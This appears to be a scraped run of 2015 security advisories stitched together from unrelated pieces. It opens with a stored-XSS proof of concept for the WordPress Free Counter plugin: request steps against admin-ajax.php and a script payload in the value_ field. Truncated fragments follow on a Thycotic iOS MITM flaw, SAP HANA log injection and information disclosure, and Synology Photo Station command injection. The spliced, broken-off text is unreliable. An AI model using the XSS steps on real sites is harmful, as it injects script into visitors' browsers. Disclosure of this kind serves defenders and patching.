# Exploit Title: WordPress Free Counter Plugin [Stored XSS]# Date: 2015/05/25# Exploit Author: Panagiotis Vagenas# Contact: https://twitter.com/panVagenas# Vendor Homepage: http://www.free-counter.org# Software Link: https://wordpress.org/plugins/free-counter/# Version: 1.1# Tested on: WordPress 4.2.2# Category: webapps# CVE: CVE-2015-40841. DescriptionAny authenticated or non-authenticated user can perform a stored XSS attack simply by exploiting wp_ajax_nopriv_check_stat action.Plugin uses a widget to display website's visits, so any page that contains this widget will also load the malicious JS code.2. Proof of Concept* Send a post request to `http://www.free-counter.org/Api.php` in order to reveal the counter id of the vulnerable site. The POST data must contain the following vars: `action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`* As a response we get a serialized indexed array. The value that we need to know is the 'counter_id'.* Send a post request to `http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: `action=check_stat&id_counter=
<counter_id from step 2>&value_=<script>alert(1)</script>`* Visit a page of the infected website that displays plugin's widget.Note that the plugin uses the update_option function to store the $_POST['value_'] contents to DB so any code inserted there will be escaped. Even though a malicious user can omit the quotes in the src attr of the script tag. Most modern browsers will treat the tag as they were there.3. SolutionNo official solution yet exists.
Thycotic Password Manager Secret Server iOS Application - MITM SSLCertificate Vulnerability--http://www.info-sec.ca/advisories/Thycotic-SecretServer.htmlOverview"With the Password Manager Secret Server app, you can access passwordsfor an EXISTING on-premise Secret Server or Secret Server Onlineaccount.""This password app combines enterprise-level security with home-usersimplicity, making it a convenient choice for both IT professionalsAND home users.""Count on Extreme Security:Your passwords are safely stored on a secure server-not on your phone.You get top-level AES 256 bit encryption.You get a personal pin code lock for an additional layer of security.A built-in password generator creates strong, unique passwords.Your data is backed by a leading enterprise password management platform.""Safe Storage for:Enterprise-level or personal passwords.Bank account and tax numbers.ATM Pins.Social security numbers.Credit card numbers.Combination lock numbers"
Onapsis Security AdvisoryONAPSIS-2015-007: SAP HANA Log InjectionVulnerability1. Impact on Business=====================Under certain conditions the SAP HANA XS engine is vulnerable toarbitrary loginjection, allowing remote authenticated attackers to write arbitraryinformation in log files.This could be used to corrupt log files or add fake content misleadingan administrator.Risk Level: Medium2. Advisory Information=======================- - Public Release Date: 2015-05-27- - Subscriber Notification Date: 2015-05-27- - Last Revised: 2015-05-27- - Security Advisory ID: ONAPSIS-2015-007- - Onapsis SVS ID: ONAPSIS-00140- - CVE: CVE-2015-3994- - Researcher: Fernando Russ, Nahuel D. Sánchez- - Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N)
Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA InformationDisclosure via SQL IMPORT FROM statement1. Impact on Business=====================Under certain conditions some SAP HANA Database commands could beabused by a remote authenticated attacker to access information whichis restricted.This could be used to gain access to confidential information.Risk Level: Medium2. Advisory Information=======================- - Public Release Date: 2015-05-27- - Subscriber Notification Date: 2015-05-27- - Last Revised: 2015-05-27- - Security Advisory ID: ONAPSIS-2015006- - Onapsis SVS ID: ONAPSIS-00142- - CVE: CVE-2015-3995- - Researcher: Sergio Abraham, Fernando Russ, Nahuel D. Sánchez- - Initial Base CVSS v2: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
------------------------------------------------------------
------------Command injection vulnerability in Synology Photo Station------------------------------------------------------------------------Han Sahin, May 2015------------------------------------------------------------------------Abstract------------------------------------------------------------------------A command injection vulnerability was found in Synology Photo Station,which allows an attacker to execute arbitrary commands with theprivileges of the webserver. An attacker can use this vulnerability tocompromise a Synology DiskStation NAS, including all data stored on theNAS.------------------------------------------------------------------------Tested version------------------------------------------------------------------------This issue was tested on Synology Photo Station version 6.2-2858.------------------------------------------------------------------------Fix------------------------------------------------------------------------Synology reports that this issue has been resolved in Photo Stationversion 6.3-2945.https://www.synology.com/en-us/releaseNote/PhotoStation------------------------------------------------------------------------Details------------------------------------------------------------------------https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html
